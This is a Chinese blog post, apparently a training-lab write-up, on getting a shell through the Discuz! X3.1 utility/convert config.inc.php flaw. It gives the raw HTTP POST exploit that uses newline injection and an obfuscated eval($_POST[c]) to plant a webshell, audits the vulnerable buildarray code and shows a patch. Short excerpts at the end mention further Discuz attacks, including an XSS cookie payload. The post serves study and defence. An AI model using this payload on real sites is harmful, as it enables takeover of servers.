Discuz x3.1 utility/convert/config.inc.php漏洞get shell

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量7.7k 收藏 4
点赞数
分类专栏: 渗透 代码审计 漏洞 文章标签: discuz 漏洞 代码审计 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XavierDarkness/article/details/78095588
版权
渗透 同时被 3 个专栏收录
18 篇文章 0 订阅
订阅专栏
代码审计
6 篇文章 0 订阅
订阅专栏
漏洞
6 篇文章 0 订阅
订阅专栏

实验环境

i 春秋 — 竞赛训练 – 这不是DZ?
操作机: Windows XP
**实验工具:**BURP、中国菜刀
目标:获取www.test.ichunqiu网站的服务器权限。

信息搜集

这是一个纯内网环境,与外界没有联网。渗透目标单一,不需要做太多的信息搜集。

打开目标网站:

嗯,特别清楚的Discuz CMS。
图片1.png

简单分析一下CMS信息:Discuz! x3.1,显然。

信息搜集是可以考察一下技术支持单位,检查 “Powered by”信息。获取CMS信息,去网上找找有没有他的开源代码或是漏洞信息。

信息搜集之 漏洞信息搜集

利用百度、Google等搜索引擎搜集漏洞信息。(由于实验环境没有网,这些资料要在本地环境搜集)
这里可能会用到 Google hacking,搜索引擎语法。
漏洞信息 在一些漏洞平台比如乌云、补天、seebug等都可能有,当然有些可能要收费才能观看。

图片2.png

随便找了几个,就找到了我们需要的。https://www.exehack.net/134.html
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611

漏洞利用:

参加:https://bbs.ichunqiu.com/thread-1909-1-1.html
我有点懒得写了,直接复制粘贴,待会直接写源码分析了

打开 www.test.ichunqiu/utility/convert
图3 - 漏洞所在页面

直接使用EXP吧

POST /utility/convert/index.php HTTP/1.1
Host: www.test.ichunqiu
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 199
Content-Type: application/x-www-form-urlencoded

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

其实其他都不重要,最后一句所传的数据才是重点!
图4 - Burp修改数据包

上菜刀!拿shell!

地址:www.test.ichunqiu/utility/convert/data/config.inc.php 密码:c

图5 - 菜刀

图6 - getshell

源码分析

这漏洞出现在一个DZ X系列自带的转换工具里面!
漏洞路径:utility/convert/data/config.inc.php在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!

我从网上下载了Discuz x3.1的源码包,利用notepad++进行代码审计。

payload

首先我们看一下完整的payload:

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

漏洞原理

index.php 文件分析

首先,打开 utility/convert/index.php 的源码:

<?php


// 包含了common.inc.php文件
require './include/common.inc.php';

// 关于getgpc函数 在global_func.php 中。参考:http://blog.csdn.net/xavierdarkness/article/details/78062852
$action = getgpc('a');		// 取$_POST['a'],直接赋值给$action ,此时$action = config;
$action = empty($action) ? getgpc('action') : $action;     //此时 $action = config;
$source = getgpc('source') ? getgpc('source') : getgpc('s');    // $source = d7.2_x2.0 HTTP/1.1;
$step = getgpc('step');
$start = getgpc('start');

……省略部分源码……

if($action == 'source') {
    require DISCUZ_ROOT.'./include/do_source.inc.php';
    // common.inc.php 如果config.inc.php文件不存在,就为true
} elseif($action == 'config' || CONFIG_EMPTY) {      // $action = config; 包含./include/do_config.inc.php 文件
    require DISCUZ_ROOT.'./include/do_config.inc.php';  
} elseif($action == 'setting') {
……省略 ……
?>

do_config.inc.php 文件分析

<?php

$configfile = DISCUZ_ROOT.'./data/config.inc.php';
$configfile_default = DISCUZ_ROOT.'./data/config.default.php';

// 创建config.inc.php
@touch($configfile);
// 检查写入权限
if(!is_writable($configfile)) {
    showmessage('config_write_error');
}

$config_default = loadconfig('config.default.php');      // 加载默认配置
$error = array();
// submitcheck()返回true,此函数定义在 include\global.func.php 文件中
if(submitcheck()) {
    $newconfig = getgpc('newconfig');	//取$_POST[newconfig]数据
/*此时newconfig[aaa
eval(eval("$_POST[c];"););//];
*/
    if(is_array($newconfig)) {
        $checkarray = $setting['config']['ucenter'] ? array('source', 'target', 'ucenter') : array('source', 'target');
        foreach ($checkarray as $key) {
            if(!empty($newconfig[$key]['dbhost'])) {
                $check = mysql_connect_test($newconfig[$key], $key);
                if($check < 0) {
                    $error[$key] = lang('mysql_connect_error_'.abs($check));
                }
            } else {
                $error[$key] = lang('mysql_config_error');
            }
        }
        //保存$newconfig到$configfile文件中,即config.inc.php文件。传入的数据没有经过任何过滤。
        save_config_file($configfile, $newconfig, $config_default);

        if(empty($error)) {
            $db_target = new db_mysql($newconfig['target']);
            $db_target->connect();
            delete_process('all');
            showmessage('config_success', 'index.php?a=select&source='.$source);
        }
    }
}

?>

函数 save_config_file

所在文件:\utility\convert\include\global.func.php

function save_config_file($filename, $config, $default) {
    $config = setdefault($config, $default);           // 将$config中的空白项用 $default 中对应项的值填充
// 联系上下文,即将 './data/config.default.php'文件对应项 赋值给 $newconfig 这个数组中对应的空白项
// 此时的$config = $newconfig+config.default.php对应项的补充
    $date = gmdate("Y-m-d H:i:s", time() + 3600 * 8);
    $year = date('Y');
    $content = <<<EOT
<?php


\$_config = array();

EOT;
        // 看下一步getvars函数,此时的$config = $newconfig+config.default.php对应项的补充
    $content .= getvars(array('_config' => $config));
    $content .= "\r\n// ".str_pad('  THE END  ', 50, '-', STR_PAD_BOTH)." //\r\n\r\n?>";
    file_put_contents($filename, $content);
}

function setdefault($var, $default) {
    foreach ($default as $k => $v) {
        if(!isset($var[$k])) {
            $var[$k] = $default[$k];
        } elseif(is_array($v)) {
            $var[$k] = setdefault($var[$k], $default[$k]);
        }
    }
    return $var;
}

函数 getvars

所在文件:\utility\convert\include\global.func.php

// $data = array('_config' => $config) 其中 $config = $newconfig+config.default.php对应项的补充
function getvars($data, $type = 'VAR') {
    $evaluate = '';
    foreach($data as $key => $val) {
        if(!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $key)) {
            continue;
        }
        if(is_array($val)) {
            // 查看buildarray函数,$key 即为_config
            $evaluate .= buildarray($val, 0, "\${$key}")."\r\n";
        } else {
            $val = addcslashes($val, '\'\\');
            $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
        }
    }
    return $evaluate;
}

buildarray函数

所在文件:\utility\convert\include\global.func.php

// 这里的$array=$config $level=0  $pre=$_config
function buildarray($array, $level = 0, $pre = '$_config') {
    static $ks;
    if($level == 0) {
        $ks = array();
        $return = '';
    }

    foreach ($array as $key => $val) {
        // 遍历$config 中的 $key => $val ,  键值对应项
        if($level == 0) {
            //str_pad — 使用另一个字符串填充字符串为指定长度
            // 第一个参数是要输出的字符串,指定长度为50,用'-'填充,居中
            $newline = str_pad('  CONFIG '.strtoupper($key).'  ', 50, '-', STR_PAD_BOTH);
            /*
            这里是产生漏洞关键
            1. DISCUZ的本意是使用$config数组的key作为每一块配置区域的"注释标题"
            2. 写入配置文件的$newline依赖于$key,而$key是攻击者可控的
            3. 未对输入数据进行正确的边界处理,导致攻击者在输入数据中插入换行符,逃离注释的作用范围,从而使输入数据转化为可执行代码
                1) 换行符
                2) ?>
            这类定界符都是可以达到同样的效果的
            */
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val)) {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        } else {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}

攻击造成的效果:

效果图

newconfig部分对照ASCII码转换一下就是如下所示:(%0a%0d对应Windows下的换行操作 \n\r)

newconfig[aaa
eval(eval("$_POST[c];"););//]=aaaa

这里我们就是通过%0a%0d进行换行操作来绕过注释,并成功将我们的恶意代码写入文件,不被注释掉,从而导致我们可以通过菜刀直接连接。

防御方法

\discuz\utility\convert\include\global.func.php

function buildarray($array, $level = 0, $pre = '$_config') 
{
  static $ks;
  if($level == 0){
     $ks = array();
     $return = '';
   }

  foreach ($array as $key => $val){ 
    //过滤掉$key中的非字母、数字及下划线字符
    $key = preg_replace("/[^\w]/", "", $key);

    if($level == 0) {
      $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
      $return .= "\r\n// $newline //\r\n";
    }

    $ks[$level] = $ks[$level - 1]."['$key']";
    if(is_array($val)){
      $ks[$level] = $ks[$level - 1]."['$key']";
      $return .= buildarray($val, $level + 1, $pre);
    }else{
      $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
      $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
    }
  }
  return $return;
}

他山之石

同一个漏洞,别人写的文章:http://www.cnblogs.com/LittleHann/p/4317665.html

XavierDarkness
关注
专栏目录
Discuz-3.1 ssrf漏洞利用操作
L18296069161的博客
12-20 548
渗透学习交流群:773617250,进群即可领取一套完整的学习工具,群内定期直播,可与老师互动,欢迎大家进群学习交流!感谢大家的支持! #001 环境搭建:  Phpstudy+win7搭建discuz漏洞环境  把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可  安装完成访问一波: #002 漏洞复现:  Centos7,临时关闭防火墙  ...
漏洞复现】Discuz-x3.1 插件漏洞
weixin_47443077的博客
05-27 2102
Discuz-x3.1 插件漏洞 文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用 一、漏洞背景 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 二、信息收集 本地IIS搭建Discuz-x3.1,发现不能直接访问 进行
Discuz! x3.1 /utility/convert/index.php Code Execution Vul
weixin_34417635的博客
05-23 415
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 Discuz! x3.1的插件/utility/convert/index.php存在代码执行漏洞,如果用户在使用完之后不删除,会导致网站容易被入侵 Relevant Link: http://sebug.net/vuld...
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1334
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
Discuz! x3.1的插件/utility/convert/index.php代码执行漏洞
weixin_30496431的博客
12-26 431
漏洞版本: Discuz! x3.1及以下版本 漏洞描述: Discuz! x3.1的插件/utility/convert/index.php存在代码执行漏洞,如果用户在使用完之后不删除,会导致网站容易被入侵。 <* 参考 http://bbs.anquan.org/forum.php?mod=viewthread&amp;amp;tid=21875http...
utility convert index.php,Discuz! x3.1的插件/utility/convert/index.php代码执行漏洞
weixin_36042436的博客
03-26 275
java入门第三步之数据库连接数据库连接可以说是学习web最基础的部分,也是非常重要的一部分,今天我们就来介绍下数据库的连接为下面学习真正的web打下基础 java中连接数据库一般有两种方式: 1.ODBC——Open Datab ...Module Zero之语言管理返回 概览介绍 如何开启 管理语言 管理本地化文本 概览介绍 ABP定义了一个健壮的UI本地化系统,它可用于服务端和客户端.它允许...
DISCUZ在win2003环境下 Unable to access ./include/common.inc.php in... 的问题终极解决方案
10-28
当我们在Windows Server 2003环境下搭建Discuz论坛时,可能会遇到“Unable to access ./include/common.inc.php”的错误,该问题通常与服务器权限设置或PHP配置不当有关。以下知识点将详细介绍该问题的排查方法和...
DISCUZ在win2003环境下 Unable to access ./include/common.inc.php in… 的问题终极解决方案
01-20
这两天论坛经常报错误信息 Warning: require_once(./include/common.inc.php) [function.require- once]: failed to open stream: No such file or directory in E:\host\aydsw\index.php on line 12 Fatal error: ...
Discuz x3.x模板 迪恩 游戏/VR/Game/测评 商业版 GBK.zip
12-03
X3.x是一款广泛使用的开源社区论坛软件,它以其强大的功能、灵活的扩展性和友好的用户体验深受广大站长喜爱。迪恩(Dean)是其中的一款知名模板开发者,其设计的模板在美观度和实用性上都有着出色的表现。本文将...
Discuz_X3.1_SC_UTF8
09-13
3. 激活新配置:`sudo ln -s /usr/local/nginx/conf/sites-available/discuz.conf /usr/local/nginx/conf/sites-enabled/` 4. 重启Nginx:`sudo systemctl restart nginx` 七、安装Discuz! X3.1 1. 解压`Discuz_X...
基于Discuz security.inc.php代码的深入分析
10-27
安全性是任何网络应用的核心关注点之一,而“security.inc.php”则是Discuz中用于增强论坛安全性的核心文件之一。本文将深入分析该文件的代码,探讨它如何提高论坛的安全防护级别。 首先,代码段的开头部分声明了...
Discuz_X3.1论坛 源码 安装文件
03-13
Discuz_X3.1_SC_GBK_0301 论坛 源码开源安装 直接upload
Discuz_X3.1源代码
05-04
Discuz_X3.1源代码,用于社区论坛开发代码
Discuz! X3.1 GBK 正式版.zip
07-09
Discuz! X3.1 在继承和完善 Discuz! X3.0 的基础上,针对广告垃圾防御进行了大幅度的调整,新防水墙、帐号保镖、云验证码等功能为社区的健康运转提供更加可靠的保障。 全新安装: 请参照以往版本的安装过程进行,上传程序,并执行 http://你的域名/论坛/install/ 升级: 请参照以往版本的安装过程进行,上传程序,并执行 http://你的域名/论坛/install/ 升级: 1. DiscuzX 程序 1.0, 1.5 2.0 , 2.5Beta, 2.5RC,2.5, 3.0 1)备份数据库 2)建立文件夹 old,旧程序除了 data , config, uc_client, uc_server 目录以外的程序移动进入 old目录中 3) 上传 3.1 程序(压缩包中 upload 目录中的文件), 如上传时候提示覆盖目录,请选择“是” 4)上传安装包 utility 目录中的 update.php 到论坛 install 目录,删除 install 目录中的index.php 执行 http://你的域名/论坛路径/install/update.php 参照提示进行升级即可。升级时间随着数据的大小和服务器性能而变, 依据测试,10G左右的论坛,从 2.5 升级值 3.0 大约需 1.5-2.5 个小时。如果你的版本更老一些,升级的时间消耗的会更多些。 升级完毕,进入后台,更新缓存,并测试功能。 升级成功后,old目录中的文件可以删除了。 2. Discuz! 7.2 或以下版本的程序 1)首先参看我们的转换教程, 将程序转换到 X2.0 2)上传 3.1 程序 3)上传 utility 目录中的 update.php 到 install 目录,删除目录中的index.php 执行 http://你的域名/论坛路径/install/update.php 参照提示进行升级即可
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1293
Discuz v3.1系列版本 Sql注入全流程详解
Discuz! X3.1 后台代码执行
zyl404的博客
12-14 756
Discuz! X3.1 后台代码执行 漏洞描述 Discuz! X3.1后台存在任意代码执行问题,要后台权限。 实验步骤 一、访问后台地址: http://域名/admin.php 账号:admin 密码:admin123 二、编辑 全局 - 站点信息 - 网站第三方统计代码 比如在这里输入 <?php phpinfo();?>然后翻到页面的最下方提交。 三、更新缓存 点击 工具 - 更新缓存 - 然后点击确定 四、点击 门户 - HTML管理 - 设置 注意专题HTML存放目录(te
dz x3 html,Discuz x3.4前台SSRF漏洞分析
weixin_30346025的博客
07-01 838
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言2018年12月3日,@L3mOn公开了一个Discuz x3.4版本的前台SSRF,通过利用一个二次跳转加上两个解析问题,可以巧妙地完成SSRF攻击链。在和小伙伴@Dawu复现过程中发现漏洞本身依赖多个特性,导致可利用环境各种缩减和部分条件的强依赖关系大大减小了该漏洞的危害。后...
漏洞分析】Discuz X3.3补丁安全分析
vspiders的博客
08-26 2414
0x01 漏洞分析 漏洞发生在页面/upload/source/admincp/admincp_setting.php页面,看源码 $settingnew = $_GET['settingnew']; if($operation == 'credits') { $extcredits_exists = 0; foreach($settingnew['extcredits'] as
discuzX3.0_存储型xss跨站漏洞-学习笔记
小龙在线
08-17 549
漏洞名称 discuzx3.0 _存储型xss跨站漏洞 发布时间 2014-01-27 漏洞分类 存储型xss漏洞 缺陷代码 没有对网络url地址参数进行过滤。 实验步骤 打开目标站点,发表日志,点选网络图片,输入以下代码http://www.22222.cc/a.gif"onerror=javascript:alert(document.cookie)> 保存链接,并发表日志。 此时如果点击该日志链接会出现弹窗。 分析和思考 xss存储型xss跨站的危害是 盗取各类用户帐号,如机器登录帐号、用户网
discuz想要访问/www/wwwroot/www.yuanbangtc.com/upload/source/plugin/zhigui_zd/admin.inc.php脚本 访问url怎么写
07-17
要访问Discuz插件的`admin.inc.php`脚本,你可以使用以下URL: ``` http://www.yuanbangtc.com/upload/source/plugin/zhigui_zd/admin.inc.php ``` 请确保将`www.yuanbangtc.com`替换为你的Discuz网站的域名或IP地址,并确保路径`/upload/source/plugin/zhigui_zd/`是正确的插件路径。这样,你就可以直接通过该URL来访问`admin.inc.php`脚本了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值